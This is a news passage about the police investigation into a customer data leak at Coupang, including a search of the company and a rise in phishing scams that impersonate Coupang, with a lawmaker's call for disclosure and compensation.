Coupang filed a criminal complaint with police on Nov. 25 regarding the leak. The police initially began an investigation based on documents submitted voluntarily by the company, but launched a compulsory search starting Tuesday. Investigators plan to trace the suspect’s methods and movements using the evidence collected in the raid. If Coupang’s negligence or legal violations are uncovered in the process, the company — currently treated as the victim — and employees responsible for handling personal information may also become subjects of investigation.
Meanwhile, the number of phishing scams linked to the Coupang breach has surged in recent days. According to Democratic Party lawmaker Lee Jeong-heon of the National Assembly’s Science, ICT, Broadcasting and Communications Committee, police received 229 phishing reports between Nov. 30 and Tuesday.
Most reports involved scams impersonating Coupang and offering fake compensation or claiming to be sending deliveries. Other familiar tactics, such as fake product review programs or phony prize announcements, were also used — many of which predate the breach.
“This incident is raising serious concerns over secondary damage such as phishing crimes,” Lee said. “Coupang and Executive Chairman Kim Bom must stop hiding behind silence and urgently take responsibility with transparent disclosure and a comprehensive compensation plan.”
